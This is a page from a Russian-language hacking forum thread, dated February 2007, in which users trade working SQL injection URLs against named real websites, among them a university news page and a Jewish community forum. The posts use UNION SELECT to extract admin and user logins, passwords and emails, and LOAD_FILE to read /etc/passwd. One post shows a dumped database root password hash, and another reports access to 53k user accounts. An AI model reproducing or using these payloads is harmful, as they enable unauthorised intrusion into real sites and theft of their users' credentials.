ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #511  
Старый 14.02.2007, 20:00
Аватар для ice1k
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


Отправить сообщение для ice1k с помощью ICQ
По умолчанию

Цитата:
Сообщение от n0ne  
Код:
http://www.nregion.com/txt.php?i=-8943+union+select+1,concat(user,0x3a,password),3,4,5,6,7,8,9+from+mysql.user/*
root:*2E4549A9308C1DFA3E3A1645E3CFD8E787134CBC
Код:
http://www.nregion.com/txt.php?i=-8943+union+select+1,LOAD_FILE(0x2f6574632f706173737764),3,4,5,6,7,8,9/*
=\
 
Ответить с цитированием

  #512  
Старый 14.02.2007, 20:37
Аватар для n0ne
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию

Цитата:
Сообщение от ice1k  
Код:
http://www.nregion.com/txt.php?i=-8943+union+select+1,LOAD_FILE(0x2f6574632f706173737764),3,4,5,6,7,8,9/*
=\
А чего смайл перекошеный?) и нафига тебе /etc/passwd если хэш рута есть?))

Последний раз редактировалось n0ne; 14.02.2007 в 20:39..
 
Ответить с цитированием

  #513  
Старый 14.02.2007, 22:51
Аватар для Termin@L
Termin@L
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме:
492591

Репутация: 123
По умолчанию

http://www.rochester.edu/news/show.php?id=27654%20or%201=1/*
бесит уже 5 раз подряд не могу столбцы подобрать
2 none - root от бд, а ему может от сервака пароли нужны
 
Ответить с цитированием

  #514  
Старый 14.02.2007, 23:07
Аватар для ice1k
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


Отправить сообщение для ice1k с помощью ICQ
По умолчанию

Цитата:
Сообщение от Termin@L  
2 none - root от бд, а ему может от сервака пароли нужны
мне они вообще не нужны...
 
Ответить с цитированием

  #515  
Старый 14.02.2007, 23:46
Аватар для kamaz
kamaz
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013

Репутация: 453
Отправить сообщение для kamaz с помощью ICQ
По умолчанию

Цитата:
http://candid.scurvy.net/profile/view.php?user_id=-4%20UNION%20SELECT%201,2,3,4,5,6,7,8,8,10,11,12,13 ,14,15,16/*
Цитата:
http://www.nekchandconference.org/public/view_text.php?user_id=-5%20union%20select%201,2,database(),user(),5,6,7,8/*
Цитата:
http://www.wvalaa.com/public/list.php?user_id=6%20union%20select%201,2,3,4,5,6, database(),8,user(),0,11/*
Цитата:
http://www.aboutpixel.de/index.php4?toppage=imagebank&subpage=member&user_i d=-4%20union%20select%201,2,user_name,4,5,6,7,8,9,0,1 1,12,13,14,15,user_icq,17,18,19,20,21,user_passwor d,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55 ,56,57,user_email,59,60,61,62,63,64%20from%204imag es_users/*
53k юзеров
 
Ответить с цитированием

  #516  
Старый 15.02.2007, 14:02
Аватар для ice1k
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


Отправить сообщение для ice1k с помощью ICQ
По умолчанию

Код:
http://www.linuxcd.org/view_distro.php?lst=&id_cate=12&id_distro=-99+union+select+1,2,concat(admin_name,0x3a,admin_pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+admin/*
=\
 
Ответить с цитированием

  #517  
Старый 15.02.2007, 16:58
Аватар для kair
kair
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286

Репутация: 187
Отправить сообщение для kair с помощью ICQ
По умолчанию

еврейская община
http://www.jewish.ru/forum/index.php?page=1&idt=15647'%20union%20select%201,2 ,3,4,5,6,email,8,9,passwd,11,12,13,14%20from%20%20 user/*
 
Ответить с цитированием

  #518  
Старый 15.02.2007, 18:19
Аватар для n0ne
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию

Termin@L, ты собираешься пароли в /etc/passwd смотреть?
 
Ответить с цитированием

  #519  
Старый 15.02.2007, 19:42
Аватар для loser
loser
Новичок
Регистрация: 13.02.2007
Сообщений: 1
Провел на форуме:
3467

Репутация: 0
По умолчанию

_http://www.monitoroflife.com/?a=details&lid=70+union+select+1*/
типа этого :
_http://www.hyipranks.com/?a=details&lid=2575+union+select+1*/
Два одинаковых движка , но реализовать хз как , т.к. используется много запросов.
 
Ответить с цитированием

  #520  
Старый 15.02.2007, 23:42
Аватар для kamaz
kamaz
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013

Репутация: 453
Отправить сообщение для kamaz с помощью ICQ
По умолчанию

Цитата:
http://www.monitoroflife.com/?a=details&lid=70+union+select+1*/
обнаружено: троянская программа Trojan-Downloader.JS.Agent.bx Скрипт: http://www.monitoroflife.com/?a=details&lid=70+union+select+1*/[6]
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ